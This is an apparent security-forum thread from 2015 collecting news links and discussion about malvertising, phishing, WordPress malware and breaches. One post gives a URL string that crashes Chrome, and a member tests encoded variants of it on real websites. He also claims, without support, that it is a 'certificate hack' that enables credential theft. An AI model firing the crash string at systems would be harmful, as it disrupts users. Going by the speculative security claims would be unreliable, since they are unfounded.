I strongly advise WP website owners, website admins, pro-active hosters and other IT staff to do so.
One thing that will make you vulnerable is outdated, unpatched or even worse: left code. Do not leave your visitors at risk, update, patch and secure. Also we find a lot of server misconfiguration and security headers missing. It is not only website code, it is also hosters that do not take security of the domains they service at heart. Excessive server header proliferation (to the world and attackers) is wide-spread. Outdated and vulnerable server code is found. Do not be an ignorant and have yourself informed by doing the necessary scans.
polonus (volunteer website security analyst and website eror-hunter)
P.S. Just an example where we find the code Daniel Cid is refering to: -http://www.brainvalue.com/en/newsroom-en/feed/rss/newsroom/newsroom-2?format=feed
Consider: -http://www.domxssscanner.com/scan?url=http%3A%2F%2Fbrainvalue.com%2Fcomponents%2Fcom_contact%2Fcommon_configs%2Fvisitor.php%3Fmob%3D1
& read: http://wordpress.stackexchange.com/questions/188763/cookiechoices-js-keeps-reappearing-without-caching-plugin
Damian
-
(http://www.screencast-o-matic.com/screenshots/u/Lh/1442614167358-6298.png)
-
Hi bob3160,
???? because there is a brand new WP update out - 4.3.1
Even a better scan here: https://sitecheck.sucuri.net/results/bob3160.wordpress.com
Analysing on https://s2.wp.com/wp-content I found this plug-in questionable: ie-sitemode
You may not have it, but I see no update address for that code, has it been left?
This has some sources and sinks, but I see no immediate threat: -http://www.domxssscanner.com/scan?url=http%3A%2F%2F0.gravatar.com%2Fjs%2Fgprofiles.js%3Fver%3D201538y
Nothing here: -http://www.domxssscanner.com/scan?url=https%3A%2F%2Fs2.wp.com%2Fwp-content%2Fmu-plugins%2Fgravatar-hovercards%2Fwpgroho.js%3Fm%3D1380573781g
Some sources and sinks:- -http://www.domxssscanner.com/scan?url=-https%3A%2F%2Fplatform.twitter.com%2Fwidgets.js%3Fver%3D20111117
and all touching on: -http://d.rmgserving.com/rmgdsc/newcafv2.js?1.1
as goes for this: -http://www.domxssscanner.com/scan?url=https%3A%2F%2Fs.skimresources.com%2Fjs%2F725X1342.skimlinks.js
and finally this-http://www.domxssscanner.com/scan?url=http%3A%2F%2Fstats.wp.com%2Fw.js%3F48
which most adblockers block for us: uMatrix has prevented the following page from loading:
-http://stats.wp.com/w.js?48
You can be assured that website is secure as far as I could establish. And Sucuri agrees with me.
See the website risk status that Netcraft gives: http://toolbar.netcraft.com/site_report?url=https://bob3160.wordpress.com
but that could have to do with the fact Netcraft sees this site for the first time, that is why the 7 red out of 10 risk score.
All's well, bob3160, ;)
Damian
-
ie-sitemode is there because I use Windows Live Writer?
-
Hi bob3160,
Well it was my pleasure checking and going over the script code there and a reassuring all green for you is not bad at all.
Congratulations.
Well I think you did not expect anything else, really :D
Damian
-
DNS Hijacks: What to Look For
https://blog.malwarebytes.org/online-security/2015/09/dns-hijacks-what-to-look-for/?utm_source=Gplus&utm_medium=social
“Your PC Is Infected” Round-up…
https://blog.malwarebytes.org/online-security/2015/09/your-pc-is-infected-round-up/?utm_source=Gplus&utm_medium=social
-
AVG releases transparent privacy policy: Yes, we will sell your data
http://www.zdnet.com/article/avg-releases-transparent-privacy-policy-yes-we-will-sell-your-data/
AVG will sell the data of its users to third parties in order to keep basic antivirus software free
-
AVG releases transparent privacy policy: Yes, we will sell your data
http://www.zdnet.com/article/avg-releases-transparent-privacy-policy-yes-we-will-sell-your-data/
AVG will sell the data of its users to third parties in order to keep basic antivirus software free
It's interesting how AVG thinks of "copies of files or emails" as "non-personal data" just because they were "marked as potential malware".
We collect non-personal data to improve our products and services, including:
data concerning potential malware threats to your device and the target of those threats, including copies of files or emails marked as potential malware, file names, cryptographic hash, vendor, size, date stamps, associated registry keys, etc.;
...snip...
http://www.avg.com/us-en/privacy-new#what-do-you-collect-that-cannot-identify-me
And,
"We collect non-personal data to make money from our free offerings so we can keep them free, including:
...snip...
Browsing and search history, including meta data;"
even though they also say
"Sometimes browsing history or search history contains terms that might identify you. If we become aware that part of your browsing history might identify you, we will treat that portion of your history as personal data, and will anonymize this information..."
So, AVG users have to trust AVG that AVG can deem what parts of their browsing history or search history contain terms that might identify them! Good luck with that!
Besides, I never like when a privacy policy uses the word "including...". That begs the question: and what else?
-
199 hacked routers SYNful Knock: http://blog.shadowserver.org/2015/09/21/synful-knock/
polonus
-
Nasty URL bug brings Google Chrome to a screeching halt (http://www.pcworld.com/article/2984907/security/nasty-url-bug-brings-google-chrome-to-a-screeching-halt.html)
Simply add "%%30%30" to the end of any URL in chrome and watch it crash.
-
Hi bob3160,
This string abuse works because the browser actually wants this to execute as %25%2530%2530
When I give your string in following directly from "https://ad.nl/" the browser url bar shows: http://caja.appspot.com/#https://ad.nl/%25%2530%2530
and this can be abused because my connection is no longer private, your bug code can be used as privacy error and for stealing credentials like passwords messages , creditcards details etc. Did you notice that, bob3160? :o
What you do with %%30%30 translated into %25%2530%2530 is a certificate hack and the server certificate no longer matches that URL or v.v. and the use of an older Cipher Suite is being flagged. Did you notice that, bob3160? :o
We stumbled upon something that could lead to indirect abuse on a large scale. Thank you very, very much for reporting this.
Trying this on the nameserver there: -http://ns1-25.akam.net/%25%2530%2530 and then condider this: 10 red out of 10 red Netcraft risk status. This certainly is an issue that goes beyond a mere Google Chrome browser bug, bob3160, you stumbled on something that needs to be analysed further, my good friend. Here the server just opens the main page: http://www.telegraaf.nl//%25%2530%2530
Damian
-
Not something I stumbled upon simply something I'm reporting.
Follow the link I supplied for more information. :)
-
That link is empty, I get an about:blank
Can you provide us with a working link?
Was it reported 21 hours ago here?: http://www.pcworld.com/article/2984907/security/nasty-url-bug-brings-google-chrome-to-a-screeching-halt.html
And the one that detected it originally: http://andrisatteka.blogspot.com/2015/09/a-simple-string-to-crash-google-chrome.html
The %25%2530%2530 translation that actually could play havoc on some https servers was my experiment here ;D
polonus
-
OOPS, it's been corrected. :)
-
Now when I give in this https://www.security.nl/%2525%252530%252530
1. https://www.security.nl/%2525%252530%252530 Security.NL 57,992 bytes 641 ms
I get here: https://www.security.nl/?welcome
And there are sources and sinks to consider: http://www.domxssscanner.com/scan?url=https%3A%2F%2Fwww.security.nl%2F%252525%25252530%25252530%09
Results from scanning URL: https://www.security.nl/js/dfp.js?1375741199
Number of sources found: 28
Number of sinks found: 11
Results from scanning URL: https://www.security.nl/js/dfp.js?1375741199
Number of sources found: 1
Number of sinks found: 1
Results from scanning URL: https://www.security.nl/js/dfp.js?1375741199
Number of sources found: 122
Number of sinks found: 60
Indeed equalling these results: http://www.domxssscanner.com/scan?url=https%3A%2F%2Fwww.security.nl%2F%3Fwelcome
Interesting and the results on various servers should be established.
This server is further secured against this and I meet a neat 404 error. This is as it should be:
http://www.huffingtonpost.com/%2525%252530%252530
Oh, Noes! A 404! As I approached this locally.
Here the whole page disappears which kicks up a dev/null: http://www.nu.nl/%2525%252530%252530 :o
polonus
-
XcodeGhost malware infiltrates App Store
https://blog.malwarebytes.org/mac/2015/09/xcodeghost-malware-infiltrates-app-store/?utm_source=Gplus&utm_medium=social
Unconventional Malvertising Attack Uses New Tricks
WordPress Malware – Active VisitorTracker Campaign
https://blog.sucuri.net/2015/09/wordpress-malware-active-visitortracker-campaign.html?utm_campaign=WordPress%20Malware%20%E2%80%93%20Active%20VisitorTracker%20Campaign%20Blogpost&utm_medium=social&utm_source=googleplus
-
Symantec employees fired for issuing rogue HTTPS certificate for Google
http://arstechnica.com/security/2015/09/symantec-employees-fired-for-issuing-rogue-https-certificate-for-google/
-
Another reason to stick to your Adblocker: https://grahamcluley.com/2015/09/forbes-malvertising/
article author - Graham Cluley
"Malvertising continues to be an attack vector of choice for criminals making use of exploit kits. By abusing ad platforms – particularly ad platforms that enable Real Time Bidding – attackers can selectively target where the malicious content gets displayed."
"When these ads are served by mainstream websites, the potential for mass infection increases significantly, leaving users and enterprises at risk."
polonus
-
Again malvertising campaign: https://blog.malwarebytes.org/malvertising-2/2015/09/malvertising-attack-hits-realtor-com-visitors/
pol
-
.htaccess Tricks in Global.asa Files
https://blog.sucuri.net/2015/09/htaccess-tricks-in-global-asa-files.html?utm_campaign=.htaccess%20Tricks%20in%20Global.asa%20Files%20Blogpost&utm_medium=social&utm_source=googleplus
GTA 5 Money Generator Scams: They’re Wheelie Bad
https://blog.malwarebytes.org/fraud-scam/2015/09/gta-5-money-generator-scams-theyre-wheelie-bad/?utm_source=Gplus&utm_medium=social
Press H to Hack: Unsolicited
https://blog.malwarebytes.org/privacy-2/2015/09/press-h-to-hack-unsolicited/
Imgur Abused in DDoS Attack Against 4Chan!
https://blog.malwarebytes.org/hacking-2/2015/09/imgur-abused-in-ddos-attack-against-4chan/
Ghostery: A Tool that Stops Trackers (This is one add-on most of us use) (FYI, I have disabled the pop-up bubble.)
https://blog.malwarebytes.org/privacy-2/2015/09/ghostery-a-tool-that-stop-trackers/
-
Kovter malware upgraded with Poweliks features
http://www.scmagazine.com/kovter-malware-upgraded-with-poweliks-features/article/440711/
Kovter malware learns from Poweliks with persistent fileless registry update
http://www.symantec.com/connect/blogs/kovter-malware-learns-poweliks-persistent-fileless-registry-update
-
Fake Online Avast Scanner
https://blog.malwarebytes.org/online-security/2015/09/fake-online-avast-scanner/ (https://blog.malwarebytes.org/online-security/2015/09/fake-online-avast-scanner/)
-
Fake Online Avast Scanner
https://blog.malwarebytes.org/online-security/2015/09/fake-online-avast-scanner/ (https://blog.malwarebytes.org/online-security/2015/09/fake-online-avast-scanner/)
This is a bit misleading since you only get to this by mistyping the Malwarebytes website.
I highly doubt that this scanner gets much use.
-
Fake Online Avast Scanner
https://blog.malwarebytes.org/online-security/2015/09/fake-online-avast-scanner/ (https://blog.malwarebytes.org/online-security/2015/09/fake-online-avast-scanner/)
This is a bit misleading since you only get to this by mistyping the Malwarebytes website.
I highly doubt that this scanner gets much use.
+1 But the fact that it's out there could mean trouble for avast.
-
SSL Malvertising Campaign Targets Top Adult Sites (Watching porn has a price.)
https://blog.malwarebytes.org/malvertising-2/2015/09/ssl-malvertising-campaign-targets-top-adult-sites/
Don’t have a Meltdown over this Lunchbox Fallout
https://blog.malwarebytes.org/fraud-scam/2015/09/dont-have-a-meltdown-over-this-lunchbox-fallout/
-
Fake Online Avast Scanner
https://blog.malwarebytes.org/online-security/2015/09/fake-online-avast-scanner/ (https://blog.malwarebytes.org/online-security/2015/09/fake-online-avast-scanner/)
This is a bit misleading since you only get to this by mistyping the Malwarebytes website.
I highly doubt that this scanner gets much use.
+1 But the fact that it's out there could mean trouble for avast.
I beg to differ, first someone has to A) mistype the URL as Bob said, B) ignore the obvious porn image, suspect to say the least C) then they would have to elect to run the fake scan and D) it would have to get past your real AV software.
That's a lot of ifs and you would like to hope the user would have enough common sense after all of them to back off.
-
Yes it takes a somewhat dumb user to fall into the trap, but the world is full of somewhat dumb users. :-\
Few dumb users claiming that "Avast infected my PC" (while in reality it was the fake site) might be enough to cause trouble, especially if reported with some alarming headlines in the media.
If I were in Avast's shoes, I would take immediate legal action and try take the site down.
-
On several blacklists now
https://www.virustotal.com/en/url/f3b2e6cc365cdbc13ac17076f56b935af20621fb09ea44abbd681f16c0ef124f/analysis/1443348829/
-
Yes it takes a somewhat dumb user to fall into the trap, but the world is full of somewhat dumb users. :-\
Few dumb users claiming that "Avast infected my PC" (while in reality it was the fake site) might be enough to cause trouble, especially if reported with some alarming headlines in the media.
If I were in Avast's shoes, I would take immediate legal action and try take the site down.
I reported the website to them via their support page :)
SITE IS NOW BLOCKED BY AVAST
-
WinRAR SFX v5.21 - Remote Code Execution Vulnerability
http://seclists.org/fulldisclosure/2015/Sep/106
-
Cookie handling in browsers can break HTTPS security
http://www.networkworld.com/article/2986286/cookie-handling-in-browsers-can-break-https-security.html (http://www.networkworld.com/article/2986286/cookie-handling-in-browsers-can-break-https-security.html)
-
Mobile Ad Networks as DDoS Vectors: A Case Study
https://blog.cloudflare.com/mobile-ad-networks-as-ddos-vectors/
-
ConfigFox: manage advanced Firefox privacy and security settings
http://www.ghacks.net/2015/09/29/configfox-manage-advanced-firefox-privacy-and-security-settings/
-
WP exploit kit hacks thousands and thousands of websites to redirect to pages with Nuclear-exploitkit!
Read article by Daniel Cid here: https://blog.sucuri.net/2015/09/wordpress-malware-visitortracker-campaign-update.html
Google watch.php malware please. For instance: http://malwarefor.me/2015-06-15-nuclear-ek-glupteba-operation-windigo-again/
polonus
-
Latest WinRAR Vulnerability has Yet to be Patched
https://blog.malwarebytes.org/security-threat/2015/09/latest-winrar-vulnerability-has-yet-to-be-patched/?utm_source=Gplus&utm_medium=social
This Instagram Account Preys on Your Trust Issues
https://blog.malwarebytes.org/online-security/2015/09/this-instagram-account-preys-on-your-trust-issues/?utm_source=Gplus&utm_medium=social
Crowdfunder Indiegogo Misused by Spammers
https://blog.malwarebytes.org/online-security/2015/09/crowdfunder-indiegogo-beset-by-spammers/?utm_source=twitter&utm_medium=social
Malvertising Via Google AdWords Leads to Fake BSOD
https://blog.malwarebytes.org/fraud-scam/2015/09/malvertising-via-google-adwords-leads-to-fake-bsod/?utm_source=Gplus&utm_medium=social
Analyzing Black Hat URL Shorteners
https://blog.sucuri.net/2015/09/analyzing-black-hat-url-shorteners.html?utm_campaign=Analyzing%20Black%20Hat%20URL%20Shorteners%20Blogpost&utm_medium=social&utm_source=googleplus
-
Patreon got attacked, users advised to change theirs passwords https://www.patreon.com/posts/important-notice-3457485
-
Skype Hacking Tool: A Sting in the Tail
https://blog.malwarebytes.org/fraud-scam/2015/09/skype-hacking-tool-a-sting-in-the-tail/?utm_source=Gplus&utm_medium=social
Top 50 InfoSec Blogs You Should Be Reading
https://digitalguardian.com/blog/top-50-infosec-blogs-you-should-be-reading?utm_campaign=External%3A%20Top%2050%20InfoSec%20Blogs%20You%20Should%20Be%20Reading%20-%20DigitalGuardian&utm_medium=social&utm_source=googleplus
-
Experian Notifies Consumers In The U.S. Who May Have Been Affected By Unauthorized Acquisition Of A Client's Data
http://www.prnewswire.com/news-releases/experian-notifies-consumers-in-the-us-who-may-have-been-affected-by-unauthorized-acquisition-of-a-clients-data-300152926.html
http://www.t-mobile.com/landing/experian-data-breach.html
-
Adblock for Chrome sold, joins Adblock Plus’ Acceptable Ads program
http://www.ghacks.net/2015/10/02/adblock-for-chrome-sold-joins-adblock-plus-acceptable-ads-program/
-
Adblock extension with 40 million users sells to mystery buyer, refuses to name new owner
http://thenextweb.com/apps/2015/10/02/trust-us-we-block-ads/
https://adblockplus.org/blog/from-the-manifesto-to-the-acceptable-ads-board
-
http://arstechnica.com/security/2015/10/gigabytes-of-user-data-from-hack-of-patreon-donations-site-dumped-online/
Patreon attack details and the leak includes source and everything including private messages and details about campaigns ...
-
Security advisory: Stored XSS in Jetpack (Cross scripting is an ever present danger.)
https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-jetpack.html?utm_campaign=Security%20advisory%3A%20Stored%20XSS%20in%20Jetpack%20Blogpost&utm_medium=social&utm_source=googleplus
New Stagefright exploit puts over 1 billion Android devices at risk
http://www.androidauthority.com/new-stagefright-exploit-puts-1-billion-android-devices-risk-646368/
The Growing Threat from Phishing
https://blog.malwarebytes.org/social-engineering/2015/10/the-growing-threat-from-phishing/?utm_source=Gplus&utm_medium=social
-
Security advisory: Stored XSS in Jetpack (Cross scripting is an ever present danger.)
https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-jetpack.html?utm_campaign=Security%20advisory%3A%20Stored%20XSS%20in%20Jetpack%20Blogpost&utm_medium=social&utm_source=googleplus
<snip>
The firefox RequestPolicy add-on is good for preventing XSS as you have to give explicit permission for 3rd party sites. It can be somewhat inconvenient for many people as sites can have tens of links/access to 3rd party sites.
-
“This PDF version is not supported” Data URI Phish
https://blog.malwarebytes.org/online-security/2015/10/this-pdf-version-is-not-supported-data-uri-phish/?utm_source=Gplus&utm_medium=social
Beware of Tech Support Impersonators
https://blog.malwarebytes.org/fraud-scam/2015/10/beware-of-tech-support-impersonators/?utm_source=Gplus&utm_medium=social
-
Is there an Internet-of-Things vigilante out there?
Linux.Wifatch compromises routers and other Internet of Things devices and appears to try and improve infected devices’ security.
www.symantec.com/connect/blogs/there-internet-things-vigilante-out-there
-
Databreaches always the same vulnerability factor = human :o
Read: http://arstechnica.com/security/2015/10/patreon-was-warned-of-serious-website-flaw-5-days-before-it-was-hacked/
It is almost impossible to fully secure a surroundings where human beings have access to.
This is one of the main truths of digital security. Human equals insecurity by default!
polonus
-
Damien,
So to improve security and stop all of the breaches, should we all shoot ourselves ???
It would certainly stop all problems. :)
-
Has the dislike button finally arrived to Facebook? ..... Of course not, don’t be fooled!
http://www.pandasecurity.com/mediacenter/news/dislike-button-facebook/
-
Nearly 1 million new malware threats released every day
http://money.cnn.com/2015/04/14/technology/security/cyber-attack-hacks-security/
PandaLabs detected more than 21 million new threats during the second quarter of 2015, an increase of 43% compared to the same period in 2014
http://www.pandasecurity.com/mediacenter/news/pandalabs-detected-more-than-21-million-new-threats/
IT threat evolution in Q1 2015
https://securelist.com/analysis/quarterly-malware-reports/69872/it-threat-evolution-in-q1-2015/
Malware statistic https://www.av-test.org/en/statistics/malware/
Spam statistic https://www.av-test.org/en/statistics/spam/
and some worry about False Positives ....
-
Beware of Tech Support Impersonators
https://blog.malwarebytes.org/fraud-scam/2015/10/beware-of-tech-support-impersonators/?utm_source=twitter&utm_medium=social
-
Beware of Tech Support Impersonators
https://blog.malwarebytes.org/fraud-scam/2015/10/beware-of-tech-support-impersonators/?utm_source=twitter&utm_medium=social
After reading that article, it all sounded very familiar. 8)
-
Beware of Tech Support Impersonators
https://blog.malwarebytes.org/fraud-scam/2015/10/beware-of-tech-support-impersonators/?utm_source=twitter&utm_medium=social
After reading that article, it all sounded very familiar. 8)
I wonder where you got that idea. ;D
-
Malvertising Campaign Targets Top Spanish Torrent Sites
https://blog.malwarebytes.org/malvertising-2/2015/10/malvertising-campaign-targets-top-spanish-torrent-sites/?utm_source=Gplus&utm_medium=social
Video Saver PUP Blocks You From Changing Your Default Browser
https://blog.malwarebytes.org/security-threat/2015/10/video-saver-pup-blocks-you-from-changing-your-default-browser/?utm_source=Gplus&utm_medium=social
Bypassing Apple’s Gatekeeper
https://blog.malwarebytes.org/mac/2015/10/bypassing-apples-gatekeeper/?utm_source=Gplus&utm_medium=social
Notes from the Lab
http://labs.sucuri.net/?note=2015-10-05&utm_campaign=Malware%20in%20comments%20Note&utm_medium=social&utm_source=googleplus
Phishing for Anonymous Alligators
https://blog.sucuri.net/2015/10/phishing-for-anonymous-alligators.html?utm_campaign=Phishing%20for%20Anonymous%20Alligators%20blogpost&utm_medium=social&utm_source=googleplus
-
Finds Angler servers at a Dallas hosting provider during research
http://www.networkworld.com/article/2989827/security/cisco-disrupts-60m-ransomware-biz.html?phint=newt%3Dnetworkworld_daily_news_alert&phint=idg_eid%3D52948c736ecce9e676edc4c93f707d83#tk.NWWNLE_nlt_daily_am_2015-10-07
-
Mozilla announces the end of NPAPI plugins in Firefox
http://www.ghacks.net/2015/10/08/mozilla-announces-the-end-of-npapi-plugins-in-firefox/
-
SHA-1-algorithm should be phased out earlier according to Dutch, French and Singapore researchers.
Read here in a a joint press release from: Centrum Wiskunde & Informatica (CWI) in the Netherlands, Inria in France and Nanyang Technological University in Singapore (NTU Singapore):
http://www.cwi.nl/news/2015/researchers-urge-industry-standard-sha-1-should-be-retracted-sooner
polonus
-
Chinese Hackers Breached LoopPay, Whose Tech Is Central to Samsung Pay
http://www.nytimes.com/2015/10/08/technology/chinese-hackers-breached-looppay-a-contributor-to-samsung-pay.html
http://global.samsungtomorrow.com/samsung-pay-is-safe-secure-and-works-almost-anywhere-you-can-swipe-or-tap-a-card-today/
-
Vulnerable Netgear Router hack, article author Michael Mimoso: https://threatpost.com/disclosed-netgear-router-vulnerability-under-attack/114960/
Hack took place mainly from malservers inside USA and victims were mainly US users. Pression upgeared on Netgear to patch!
Action going to take the attack server(s) down.
Netgear-routers with router-firmware: N300_1.1.0.31_1.0.1.img en N300-1.1.0.28_1.0.1.img are vulnerable to such attack,
like used for WNR1000v4 Router.
polonus
-
“GTA V for Mobile” Sites Lead to Surveys
https://blog.malwarebytes.org/online-security/2015/10/gta-v-for-mobile-sites-lead-to-surveys/?utm_source=Gplus&utm_medium=social
Brute Force Amplification Attacks Against WordPress XMLRPC
https://blog.sucuri.net/2015/10/brute-force-amplification-attacks-against-wordpress-xmlrpc.html?utm_campaign=Brute%20Force%20Amplification%20Attacks%20Against%20WordPress%20XMLRPC%20blogpost&utm_medium=social&utm_source=googleplus
-
Tech Support Scam Asks for Passkey
https://blog.malwarebytes.org/fraud-scam/2015/10/tech-support-scam-asks-for-passkey/?utm_source=Gplus&utm_medium=social
SHA1 algorithm securing e-commerce and software could break by year’s end
http://arstechnica.com/security/2015/10/sha1-crypto-algorithm-securing-internet-could-break-by-years-end/?utm_campaign=External%3A%20SHA1%20algorithm%20securing%20e-commerce%20and%20software%20could%20break%20by%20year%E2%80%99s%20end&utm_medium=social&utm_source=googleplus
Security Tips & Tricks for the iPhone 6s/6s Plus
https://blog.malwarebytes.org/mobile-2/2015/10/security-tips-tricks-for-the-iphone-6s6s-plus/?utm_source=Gplus&utm_medium=social
We as a forum community know and learn about security issues.
It's the average user who don't have a clue that will wonder "what happened?".
The main security issue is PEBKAC.
-
Here we go again, once more mal-ads on Kickass Torrents
Reported here: https://www.google.com/safebrowsing/diagnostic?site=http%3A%2F%2Fkat.cr%2F&client=googlechrome&hl=en-US abuse was reported by Google Safebrowsing research!
Users of firefox and Google Chrome browsers are being protected as by default as kat.cr is blocked.
And yes again sloppy cheap bulk-hoster, GoDaddy, at the core of this abuse: https://urlquery.net/report.php?id=1444570618399
where allegedly Rip van Winkle has an IT job now ;) : http://sitevet.com/db/asn/AS26496 with 10500 blacklisted URLs hosted.
polonus (volunteer website security analyst and website error-hunter)
-
Dow Jones & Company Inc. Data Leak
http://s.wsj.net/message/dowjonesletter-20151009.pdf
-
Obvious browser security mistakes often made:
Having multiple tabs opened in the web browser with mixed secure and insecure sites.
For example dont login in to your secure forum account here, when you simultaneously visit a torrent site.
polonus
-
Obvious browser security mistakes often made:
Having multiple tabs opened in the web browser with mixed secure and insecure sites.
For example dont login in to your secure forum account here, when you simultaneously visit a torrent site.
polonus
Who visits torrent sites ???
-
Obvious browser security mistakes often made:
Having multiple tabs opened in the web browser with mixed secure and insecure sites.
For example dont login in to your secure forum account here, when you simultaneously visit a torrent site.
polonus
Who visits torrent sites ???
Millions of people.
-
Obvious browser security mistakes often made:
Having multiple tabs opened in the web browser with mixed secure and insecure sites.
For example dont login in to your secure forum account here, when you simultaneously visit a torrent site.
polonus
Who visits torrent sites ???
Millions of people.
One of the reasons why there's so much activity on the Virus & Worms section of the forum. :)
-
All depends on what you're trying to download and how well you research your sources, I've never been infected via a torrent but I don't just click - click - click ;)
Most of our ECU ( engine control unit ) files are shared via torrents for accessibility so there are many good reasons to use torrents as well and not just for illegal movies and such.
-
Hi bob3160 and CraigB,
But knowing you two would react, then I would have chosen another example of course. ;D
So you shouldn't open a secure tab next to an insecure tab as tracking info from the secure could spill over to the insecure. So whenever doing online banking for instance, close all other tabs and/or browsers. That was the essence of my warning and I was speaking in general and not about the alleged insecurity of torrent sites, while Kickass torrents had some maicious ads lately that were highly infectious. :(
But as a recent Kaspersky report has found out that 75% of users does not know an infested extension from an uninfested one (and fall for mp3.exe or a src file for instance) and only 25% knows a real website from a PHISHING site, a lot of folks really should have their computers taken from them because of sheer ignorance and "nitwit". ;D
polonus
-
Hundreds of SSL-certificates issues to PHISHing sites: http://news.netcraft.com/archives/2015/10/12/certificate-authorities-issue-hundreds-of-deceptive-ssl-certificates-to-fraudsters.html
pol
-
Dow Jones Discloses Customer Data Breach
http://www.wsj.com/articles/dow-jones-discloses-customer-data-breach-1444406517
(Owned by News Corp. via Dow Jones and Company)
-
“Casino Online Award” 419 Scam…
https://blog.malwarebytes.org/fraud-scam/2015/10/casino-online-award-419-scam/?utm_source=Gplus&utm_medium=social
-
Microsoft Security Bulletin Summary for October 2015
https://technet.microsoft.com/en-us/library/security/ms15-oct.aspx
-
Caution! PayPal Phishing e-mail Scam
(http://www.screencast-o-matic.com/screenshots/u/Lh/1444823237881-69161.png)
It may look official but,
1. It didn't come from Paypal
2. The link to "Restore" your PayPal account, leads to
(http://www.screencast-o-matic.com/screenshots/u/Lh/1444823602884-55136.png) which has nothing to do with PayPal.
3. Notice the bad grammar and the spelling and punctuation errors.
(http://www.screencast-o-matic.com/screenshots/u/Lh/1444823522999-79485.png)
If you're using Avast, it also protects you since it prevents you from getting to the actual Website.
PayPal will never ask you via email to click on a link to do anything pertaining to your PayPal account.
-
@ Bob,
English isn't their strong suit, as is the case for many of these scam attempts.
-
Angler Exploit Kit Blasts Daily Mail Visitors Via Malvertising
https://blog.malwarebytes.org/malvertising-2/2015/10/angler-exploit-kit-blasts-daily-mail-visitors-via-malvertising/?utm_source=Gplus&utm_medium=social
Redirect to Microsoft Word Macro Virus
https://blog.sucuri.net/2015/10/redirect-to-microsoft-word-macro-virus.html?utm_campaign=Redirect%20to%20Microsoft%20Word%20Macro%20Virus%20Blogpost&utm_medium=social&utm_source=googleplus
Beginner’s Guide to Fixing Your Hacked WordPress Site
http://www.wpbeginner.com/beginners-guide/beginners-step-step-guide-fixing-hacked-wordpress-site/?utm_campaign=External%3A%20Beginner%E2%80%99s%20Guide%20to%20Fixing%20Your%20Hacked%20WordPress%20Site&utm_medium=social&utm_source=googleplus
-
You missed one point that's even easier to spot, Bob:
4. PayPal will never, ever address you with a generic greeting like "Dear ... customer". Any number of times, they've made the point that they will always address you by your full registered name, whether individual or enterprise. Any millennium now, scammers may finally wake up to that fact, but in the meantime anything supposedly from them open with some variation of "dear customer/client/member" is guaranteed to be fake.
Caution! PayPal Phishing e-mail Scam
(http://www.screencast-o-matic.com/screenshots/u/Lh/1444823237881-69161.png)
It may look official but,
1. It didn't come from Paypal
2. The link to "Restore" your PayPal account, leads to
(http://www.screencast-o-matic.com/screenshots/u/Lh/1444823602884-55136.png) which has nothing to do with PayPal.
3. Notice the bad grammar and the spelling and punctuation errors.
(http://www.screencast-o-matic.com/screenshots/u/Lh/1444823522999-79485.png)
If you're using Avast, it also protects you since it prevents you from getting to the actual Website.
PayPal will never ask you via email to click on a link to do anything pertaining to your PayPal account.
-
UK internet users potential victims of serious cyber attack
http://www.nationalcrimeagency.gov.uk/news/723-uk-internet-users-potential-victims-of-serious-cyber-attack
-
New Adobe Flash Zero-Day Used in Pawn Storm Campaign Targeting Foreign Affairs Ministries
http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-flash-zero-day-used-in-pawn-storm-campaign/
-
Malware-entry-mwexploitkitblackhole1 back on quite some scale: https://forum.avast.com/index.php?topic=177466.msg1259694#new
polonus
-
New Flash Player Zero-Day in The Wild
https://blog.malwarebytes.org/zero-days/2015/10/new-flash-player-zero-day-in-the-wild/?utm_source=Gplus&utm_medium=social
Stolen 7-zip bundled with adware?
https://blog.malwarebytes.org/online-security/2015/10/stolen-7-zip-bundled-with-adware/?utm_source=Gplus&utm_medium=social
Security Advisory: Stored XSS in Akismet WordPress Plugin
https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html?utm_campaign=External%3A%20Akismet%203.1.5%3A%20Security%20Release&utm_medium=social&utm_source=googleplus
-
Be aware your free download could have come bundled with an unwanted guest, PC Backup.
PCBackup is a misleading program and there has been malware detected inside it.
It can also come installed on your computer by Dell or other computer manufacturers.
Read: http://www.shouldiremoveit.com/MyPC-Backup-19242-program.aspx
Many PC manufacturers have it installed like Dell, Acer, Lenovo.
Go to configuration and uninstall the program. 68% of good people uninstall it!
I just heard from someone that it is a privacy risk, because they have the info you shared with those that installed it,
mail address and who knows what more, so also a privacy injunction there.
polonus
-
Be aware your free download could have come bundled with an unwanted guest, PC Backup.
PCBackup is a misleading program and there has been malware detected inside it.
It can also come installed on your computer by Dell or other computer manufacturers.
Read: http://www.shouldiremoveit.com/MyPC-Backup-19242-program.aspx (http://www.shouldiremoveit.com/MyPC-Backup-19242-program.aspx)
Many PC manufacturers have it installed like Dell, Acer, Lenovo.
Go to configuration and uninstall the program. 68% of good people uninstall it!
I just heard from someone that it is a privacy risk, because they have the info you shared with those that installed it,
mail address and who knows what more, so also a privacy injunction there.
polonus
They already have the information the second you register your product or if bought on line, you also supply that information.
-
Hi bob3160,
Thank you for that info bob, but it is new to me that when you give that info to the computer manufacturer it also gets to all the bundler software firms, How should PCBack up know my mail address (or google all account serves it up to them), we bought something online and they automattically filled out the age of my sprouse :o, you cannot have any secrets on the Interwebs anymore ;D. They could have been somewhat more discrete? ;D
polonus
-
New Adobe Flash Zero-Day Used in Pawn Storm Campaign Targeting Foreign Affairs Ministries
http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-flash-zero-day-used-in-pawn-storm-campaign/
-> https://helpx.adobe.com/security/products/flash-player/apsa15-05.html
-
Mozilla Add-on guidelines
https://blog.malwarebytes.org/online-security/2015/10/mozilla-add-on-guidelines/?utm_source=Gplus&utm_medium=social
-
New Flash Player Zero-Day in The Wild (updated)
https://blog.malwarebytes.org/zero-days/2015/10/new-flash-player-zero-day-in-the-wild/?utm_source=Gplus&utm_medium=social
eFast browser hijacks file associations
https://blog.malwarebytes.org/online-security/2015/10/efast-browser-hijacks-file-associations/?utm_source=Gplus&utm_medium=social
-
Sinkholed domain returned from the graveyard to serve in ad-fest:
https://forum.avast.com/index.php?topic=177906.0
So not only parked domains deserve this fate, others also will serve up ads from inside the grave.
polonus
-
One million SSL certificates still using “insecure” SHA-1 algorithm
Read Netcraft's report here: http://news.netcraft.com/archives/2015/10/19/one-million-ssl-certificates-still-using-insecure-sha-1-algorithm.html
polonus
-
Joomla alerts to wait for a critical update soon: https://www.joomla.org/announcements/release-news/5633-important-security-announcement-pre-release.html
polonus
-
